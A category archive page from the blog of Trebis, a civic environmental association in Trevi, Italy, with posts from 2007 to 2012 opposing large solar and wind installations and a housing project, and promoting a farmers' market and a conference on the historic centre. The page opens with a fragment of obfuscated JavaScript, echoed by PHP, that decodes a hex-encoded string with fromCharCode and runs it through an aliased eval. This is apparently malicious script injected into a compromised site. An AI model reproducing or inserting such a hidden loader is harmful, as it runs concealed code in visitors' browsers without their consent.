q4Zq1Zq72Zq4Zq1Zq60Zq5dZq1fZq3eZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq70Zq6aZq61Zq5aZq67Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74\"[gzr](\"Zq\");}uwo=cpf;uoukoc=[];for(ymg=22-20-2;-ymg 1420!=0;ymg =1){ubtze=ymg;if((0x19==031))uoukoc =pivr.fromCharCode(eval(xcf uwo[1*ubtze]) 0xa-nhmv);}ilqz=eval;if(Math.ceil(5.5)===6)ilqz(uoukoc)}";echo $x;} ?>

Archive for the 'Il nostro territorio' Category

Aggiornamenti

admin Novembre 16th, 2012

Cari Soci
al contrario di quanto può sembrare, la Trebis è viva e attiva! Il consiglio sta lavorando sul tema molto complesso e difficile, ma molto importante, della cava Metelli che, come sapete, suscita non pochi perplessità. Abbiamo rivolto varie domande al Commissario, che gentilmente ci ha risposto e ora cerchiamo un’incontro personale col Commissario per chiarire alcuni punti. Dopodichè vogliamo invitarvi ad una riunione per sentire l’esito e per discutere delle proposte per iniziative nel 2013.
Cordiali saluti, Patricia Clough

Acqua, Terra, Fotovoltaico - Trevi 05.11.2011

admin Novembre 3rd, 2011

Cari Soci
come sapete, la nostra conferenza “Acqua, Terra, Fotovoltaico - quale futuro per la nostra valle?” si terrà sabato 5 novembre alle 15 a Villa Fabri. Mi auguro che tutto possiate venire.

Cordiali saluti.

convegnoacquaterrafotovoltaico.jpg

Fotovoltaico sì, ma con criterio

admin Settembre 8th, 2011

La Trebis denuncia:

Si è venuti a conoscenza, per caso, che il 30 agosto prossimo il progetto per un polo di energia alternativa - in questo caso un grande impianto di pannelli fotovoltaici - da realizzare nel Comune di Trevi sarà presentato per l’approvazione alla Provincia di Perugia.

La Trevis appoggia e sostiene il fotovoltaico in quanto fonte di energia pulita e finalizzata all’autoproduzione. Il progetto che sarà presentato in Provincia consiste in un vasto rettangolo di file serrate di pannelli, visibile dappertutto e devastante da un punto di vista ambientale.

La data - il 30 agosto - e la totale mancata informazione e partecipazione dei cittadini Trevani ci fa pensare che sia un ennesimo tentativo per imporre sul nostro territorio scelte devastanti e non condivise, che potrebbero aprire la strada ad altri investimenti esclusivamente speculativi a danno del nostro ambiente.

Il nostro futuro impegno sarà di contrastare tutto ciò, coinvolgendo tutta la cittadinanza.

Auspichiamo che il 30 agosto non venga presa nessuna decisione in merito, anche in considerazione del difficile momento politico che sta attraversando il nostro Comune.

Le ex serre: una vittoria per la Trebis?

admin Maggio 2nd, 2011

L’annuncio della sospensione del progetto per un finto “villaggio turistico” sul sito delle ex serre sarebbe apparentemente una fonte di soddisfazione per la Trebis, che si è costituita quattro anni fa proprio per combattere quella iniziativa mostruosa.

La ditta Pietrarossa Inn, proprietaria del sito, ha chiesto in uno scritto formale all’Amministrazione Comunale solo la “temporanea sospensione” del’iter burocratico del “villaggio”, mantenendosi aperta una via d’uscita per ogni evenienza.

Questo annuncio della proprietà, che tra l’altro propone, in sostituzione del megaprogetto, un “polo di energia alternativa” su quel sito, va preso con grande cautela, soprattutto perchè arriva in questo periodo preelettorale.

Sembra che alla base della nuova proposta vi sia anche la crisi economica, che rende velleitari progetti di proporzioni gigantesche come il “villaggio” in questione, il quale non è altro, secondo noi, che una gigantesca speculazione edilizia.

Su questo punto possiamo veramente cantare vittoria, perché se con la nostra azione non fossimo riusciti a ritardare l’approvazione del progetto per vari anni, avremmo ora un centinaio di villette e costruzioni incomplete o vuote su un sito importante della fascia pedecollinare.

Il nostro compito ora è di vigilare su due fronti; il primo che non si riprenda, dopo le elezioni, l’iter di approvazione della variante riguardante il progetto delle cento villette, il secondo che gli impianti di energia alternativa - probabilmente pannelli fotovoltaici – siano collocati, come ha promesso la ditta Pietrarossa Inn, “con la massima attenzione a tutti gli aspetti ambientali legati a tale area.”

Un mare ininterrotto di pannelli, come sono sorti in America e ora anche in Europa, distruggerebbe la bellezza della nostra valle. Anche queste scelte, dunque, all’apparenza così “ecologiche”, necessitano di una visione complessiva del territorio e dei problemi paesaggistici di cui dovrà farsi carico la nuova amministrazione.

Trebis come sempre darà il suo contributo.

ANCORA ATTACCHI AL PAESAGGIO

admin Aprile 16th, 2009

DOPO LA DISTRUZIONE DELLA PIANURA E L’ATTACCO ALLA COLLINA CON UNA URBANIZZAZIONE SELVAGGIA ORA E’IL MOMENTO DELLA MONTAGNA

Italia Nostra Onlus Sezione di Foligno e l’Associazione Trebis di Trevi sono contrarie alla proposta di realizzare un impianto industriale di energia prodotta dal vento in località Monte Morro, Monte Santo Stefano e zone limitrofe in un’area che presenta un elevato grado di naturalità e valori estetico-paesaggistici con la presenza di specie animali e vegetali con priorità di conservazione e di tutela, area di particolare interesse naturalistico ed ambientale ai sensi dell’art. 14 della L.R. 24 Marzo 2000, n° 27.

L’impatto visivo, senza parlare poi della rumorosità, dell’impianto industriale sarebbe disastroso essendo l’opera ben visibile in quanto realizzata in area ad alta esposizione panoramica, area tra l’altro esclusa dal Piano territoriale di coordinamento della Provincia di Perugia per la localizzazione di impianti eolici.

L’eolico, come ormai è noto, è un business per chi costruisce gli impianti e li gestisce con i certificati verdi, un affare che poco o nulla ha a che vedere con la lodevole volontà di ridurre l’inquinamento, in quanto trattasi allo stato attuale di una fonte energetica che può essere solo considerata di integrazione alla produzione tradizionale.

Infatti, l’eolico produce energia (quando poi la produce, visto che in l’Italia è uno dei Paesi meno ventosi del mondo sia per intensità che per continuità) in modo discontinuo senza possibilità di accumulo e quindi da consumarsi immediatamente.

Inoltre, l’eolico potrebbe coprire al massimo un 6% del fabbisogno energetico nazionale, percentuale che è facilmente raggiungibile con una sana politica di risparmio energetico, senza distruzione del paesaggio montano e dei suoi delicati ecosistemi e senza compromettere il valore economico legato al turismo.

La richiesta è della società INERGIA e il progetto, che prevede l’istallazione di n° 7 aerogeneratori, può essere visionato presso i Comuni di Foligno, Trevi, Sellano, Campello sul Clitunno e Serravalle del Chienti.

Altra società la EHN ITALY ha presentato istanza per altro impianto industriale eolico con l’istallazione di ben 19 aerogeratori in località Faeto a ridosso dell’altopiano di Colfiorito già oggetto di altre quattro istanza di impianti industriali eolici il cui progetto può essere visionato presso il Comune di Foligno, Valtopina e Nocera Umbra.

Quindi, per comprendere la gravità e l’impatto sul paesaggio e sull’ambiente, in qualche Kmq della montagna di Foligno dovrebbe insistere ben sei impianti industriali eolici con tutte le loro infrastrutture (strade, cabine, pali,….).

Italia Nostra Onlus Sezione di Foligno Gianfranco Angeli

Associazione Trebis di Trevi Giancarlo Izzo

–>

Farmer Market anche a Trevi

admin Novembre 13th, 2007

Corriere dell’Umbria del  03 ottobre 2007

L’associazione Trebis Onlus lancia al sindaco la proposta di un “Farmer’s Market”

Frutta e verdura a prezzi di costo

TREVI - La proposta è stata avanza­ta dall’associazione Trebis Onius al sindaco e all’assessore all’agri­coltura del Comune di Trevi. Si tratta di realizzare un “Farmer Market”, una sorta di mercato per la vendita di alimentari dal produt­tore al consumatore con il preciso scopo di ridurre i prezzi di almeno il 30-40 per cento. Iniziativa dun­que che non mancherà di trovare proseliti interessati all’acquisto di prodotti a prezzi assai contenuti. Naturalmente   potranno   essere messi in vendita sul territorio solo i beni prodotti direttamente sul ter­ritorio stesso Continue Reading »

Convegno sul Centro Storico

admin Settembre 12th, 2007

Carissimi Amici,
la data del nostro convegno sul Centro Storico è stata fissata per sabato, 1 dicembre, alle ore 16.00 nella Sala Convegni del Museo.

Il Sindaco ha gentilmente accettato di sponsorizzare il convegno (in modo che non dovremo pagare l’affitto della sala) e di partecipare al dibattito. Un sotto-comitato del consiglio direttivo è stato incaricato dell’organizzazione. L’intenzione è di invitare uno o due urbanisti qualificati a fare delle proposte concrete per rivitalizzare e ripopolare il centro storico, e di far seguire un dibattito con gli altri soggetti direttamente interessati come, per esempio, i proprietari di qualche dimora storica, commercianti, residenti, il Sindaco, ecc ecc. Segurà un dibattito pubblico.

L’idea iniziale era di tenere un convegno generale su tutti i problemi ambientali di Trevi, ma il consiglio direttivo si è reso conto che sarebbe durato almeno due giorni, con costi molto alti e difficoltà organizzative evidenti. Si è pensato quindi ad una serie di convegni limitati a temi singoli, cominciando con la rivitalizzazione del centro storico.

La capacità della Sala Convegni è di circa 150 persone. Se ci rendiamo conto che l’afflunza sarà più alta - come speriamo - ci trasferiremo in una sala più grande.

Quanto prima faremo un’annuncio ufficiale con l’elenco dei partecipanti.

Il Direttivo

–>

Come diventare Città Slow

admin Agosto 19th, 2007

Nel sito del Comune di Trevi è messo in risalto che Trevi “E’ tra i soci fondatori dell’Associazione “Città Slow”".

Siccome alle parole devono seguire i fatti, riportiamo il requisiti necessari per far parte dell’associazione e di conseguenza gli obblighi di cui il comune di Trevi si è fatto carico.

Ognuno potrà valutare autonomamente.

————————————————————————

Come diventare CITTASLOW

Continue Reading »

Ambiente, summit per la salvaguardia

admin Aprile 17th, 2007

Il resoconto dell’assemblea del 13 aprile
Corriere dell’Umbria del 15 aprile 2007

Ambiente, summit per la salvaguardia
In primo piano le ex serre di Santa Maria in Valle

TREVI - Avviare una indagine conoscitiva su più fronti sul territorio. in sinergia con l’assessore Gianni Antonini, creare un coordinamento di tutti i comitati dell’Umbria ed organizzare una grande festa con momenti culturali, promuovere una conferenza di altissimo livello sull’ambiente (s’è pensato con la presenza di Asor Rosa), con il coinvolgimento di tutte le associazioni ambientaliste e la realizzazione del parco delle Brunette. Suggerimento arrivato da Vito Trombetta. Queste alcune delle proposte e suggerimenti in tema di salvaguardia dell’ambiente, accolti all’unanimità nel corso dell’assemblea dei soci dell’associazione Trebis Onlus che s’è svolta venerdì Continue Reading »

La tutela dell’ambiente diventa priorità

admin Marzo 24th, 2007

Corriere dell’Umbria del 23 marzo 2007 

Trevi il consiglio comunale approva il documento per aderire al progetto “Emas II”

La tutela dell’ambiente diventa priorità

Attività mirate per il sostegno dell’agricoltura biologica

TREVI - II percorso è iniziato. E’ stato approvato infarti con atto unanime del consiglio comunale il documento iniziale della “Politica ambientale” inserito nel progetto Emas II. Documento che traccia le linee fondamentali su cui si muoverà l’amministrazione comunale al fine di migliorare le proprie prestazioni ambientali e che definisce inoltre obiettivi concreti da perseguire in vista della certificazione secondo quanto previsto per l’appunto, dal regolamento Emas II. Regolamento che si pone l’obiettivo Continue Reading »

Next »